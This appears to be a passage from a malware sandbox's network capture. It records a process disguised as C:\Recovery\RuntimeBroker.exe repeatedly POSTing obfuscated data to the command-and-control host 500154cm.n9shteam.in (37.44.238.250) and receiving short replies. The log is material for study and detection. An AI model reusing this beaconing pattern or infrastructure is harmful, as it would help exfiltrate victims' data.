Nov 12, 2024 00:42:58.322570086 CET | 2512 | OUT | Data Raw: 54 50 5b 54 56 5f 59 52 5c 58 5a 51 50 58 58 54 5b 54 5e 5f 55 5a 5a 54 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
Data Ascii: TP[TV_YR\XZQPXXT[T^_UZZT__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'_936\="3C3"+$=3&#;5'\=&.4 *+&[!"^.!
Nov 12, 2024 00:42:58.533256054 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:58.604937077 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:42:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 49789 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:58.921369076 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Nov 12, 2024 00:42:59.275695086 CET | 2512 | OUT | Data Raw: 51 55 5b 56 56 50 59 53 5c 58 5a 51 50 5e 58 55 5b 5c 5e 5b 55 58 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
Data Ascii: QU[VVPYS\XZQP^XU[\^[UXZ\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'],#.=+=#,>$,5++>5!6$6*5*] 3")%&[!"^.9
Nov 12, 2024 00:42:59.508398056 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:59.580563068 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:42:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.4 | 49790 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:59.706056118 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Connection: Keep-Alive
Nov 12, 2024 00:43:00.056962967 CET | 2512 | OUT | Data Raw: 51 55 5b 54 56 58 5c 5a 5c 58 5a 51 50 59 58 5d 5b 50 5e 5b 55 5f 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
Data Ascii: QU[TVX\Z\XZQPYX][P^[U_Z\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$.V)>]16<"C3^!$S>U"Y!)W0=1]>%#V6?&[!"^.%
Nov 12, 2024 00:43:00.290896893 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:43:00.369771004 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:43:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ
Nov 12, 2024 00:43:00.734991074 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:43:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.4 | 49792 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:43:00.736243963 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Connection: Keep-Alive
Nov 12, 2024 00:43:01.088473082 CET | 2512 | OUT | Data Raw: 54 50 5b 51 56 5e 59 59 5c 58 5a 51 50 58 58 52 5b 52 5e 58 55 5a 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
Data Ascii: TP[QV^YY\XZQPXXR[R^XUZZ^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'], 5=>"6A'%"8R*:X#+5V3*>2]4")%&[!"^.!
Nov 12, 2024 00:43:01.319950104 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:43:01.399549961 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:43:01 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 49793 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:43:01.753824949 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Connection: Keep-Alive
Nov 12, 2024 00:43:02.103985071 CET | 2512 | OUT | Data Raw: 51 52 5b 57 53 5c 5c 58 5c 58 5a 51 50 5b 58 57 5b 53 5e 5d 55 5e 5a 5b 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
Data Ascii: QR[WS\\X\XZQP[XW[S^]U^Z[__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$,0=!,)$536'*6!^!U35[>7=)%&[!"^.-
Nov 12, 2024 00:43:02.338571072 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:43:02.419220924 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:43:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 49795 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:43:02.545066118 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Connection: Keep-Alive
Nov 12, 2024 00:43:02.900742054 CET | 2512 | OUT | [request body]
Nov 12, 2024 00:43:03.110636950 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:43:03.188206911 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:43:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.4 | 49801 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:43:03.349071980 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 49806 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:43:03.500494957 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 1840
Expect: 100-continue
Connection: Keep-Alive
Nov 12, 2024 00:43:03.855086088 CET | 1840 | OUT | [request body]
Nov 12, 2024 00:43:04.099565983 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:43:04.166439056 CET | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:43:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 49807 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:43:03.627464056 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Connection: Keep-Alive
Nov 12, 2024 00:43:03.982310057 CET | 2512 | OUT | [request body]
Nov 12, 2024 00:43:04.193228006 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:43:04.266643047 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:43:04 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 49811 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:43:04.631130934 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Nov 12, 2024 00:43:04.978873968 CET | 2512 | OUT | [request body]
Nov 12, 2024 00:43:05.197417974 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:43:05.432389975 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:43:05 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.4 | 49819 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:43:05.561860085 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Nov 12, 2024 00:43:05.916728973 CET | 2512 | OUT | [request body]
Nov 12, 2024 00:43:06.131098986 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:43:06.202944040 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:43:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.4 | 49825 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:43:06.332216024 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Nov 12, 2024 00:43:06.683012962 CET | 2512 | OUT | [request body]
Nov 12, 2024 00:43:06.898207903 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:43:06.972584963 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:43:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.4 | 49831 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:43:07.149437904 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Connection: Keep-Alive
Nov 12, 2024 00:43:07.494545937 CET | 2512 | OUT | [request body]
Nov 12, 2024 00:43:07.715240002 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:43:07.796977997 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:43:07 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.4 | 49837 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:43:07.927342892 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Connection: Keep-Alive
Nov 12, 2024 00:43:08.276011944 CET | 2512 | OUT | [request body]
Nov 12, 2024 00:43:08.513143063 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:43:08.593707085 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:43:08 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.4 | 49843 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:43:08.740202904 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Connection: Keep-Alive
Nov 12, 2024 00:43:09.088938951 CET | 2512 | OUT | [request body]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.4 | 49849 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:43:09.218628883 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 1840
Expect: 100-continue
Connection: Keep-Alive
Nov 12, 2024 00:43:09.579322100 CET | 1840 | OUT
Nov 12, 2024 00:43:09.787758112 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:43:09.865981102 CET | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:43:09 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.4 | 49850 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:43:09.718008995 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Connection: Keep-Alive
Nov 12, 2024 00:43:10.073080063 CET | 2512 | OUT
Nov 12, 2024 00:43:10.286243916 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:43:10.362803936 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:43:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.4 | 49860 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:43:10.481400013 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Nov 12, 2024 00:43:10.838354111 CET | 2512 | OUT
Nov 12, 2024 00:43:11.064681053 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:43:11.143039942 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:43:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.4 | 49867 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:43:11.266812086 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Connection: Keep-Alive
Nov 12, 2024 00:43:11.619605064 CET | 2512 | OUT
Nov 12, 2024 00:43:11.832807064 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:43:12.056829929 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:43:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.4 | 49873 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:43:12.477610111 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Connection: Keep-Alive
Nov 12, 2024 00:43:12.823370934 CET | 2512 | OUT
Nov 12, 2024 00:43:13.063471079 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:43:13.141510963 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:43:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.4 | 49879 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:43:13.271601915 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Connection: Keep-Alive
Nov 12, 2024 00:43:13.619584084 CET | 2512 | OUT
Nov 12, 2024 00:43:13.856839895 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:43:13.935003042 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:43:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.4 | 49889 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:43:14.060132027 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Connection: Keep-Alive
Nov 12, 2024 00:43:14.416441917 CET | 2512 | OUT
Nov 12, 2024 00:43:14.624598980 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:43:14.705497026 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:43:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.4 | 49894 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:43:14.931777000 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 1820
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.4 | 49896 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:43:15.119975090 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Connection: Keep-Alive
Nov 12, 2024 00:43:15.478975058 CET | 2512 | OUT
Nov 12, 2024 00:43:15.702661037 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:43:15.780616999 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:43:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.4 | 49903 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:43:15.904414892 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Nov 12, 2024 00:43:16.469162941 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:43:16.547019958 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:43:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ
Nov 12, 2024 00:43:16.894324064 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:43:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.4 | 49911 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe

Timestamp | Bytes transferred | Direction | Data
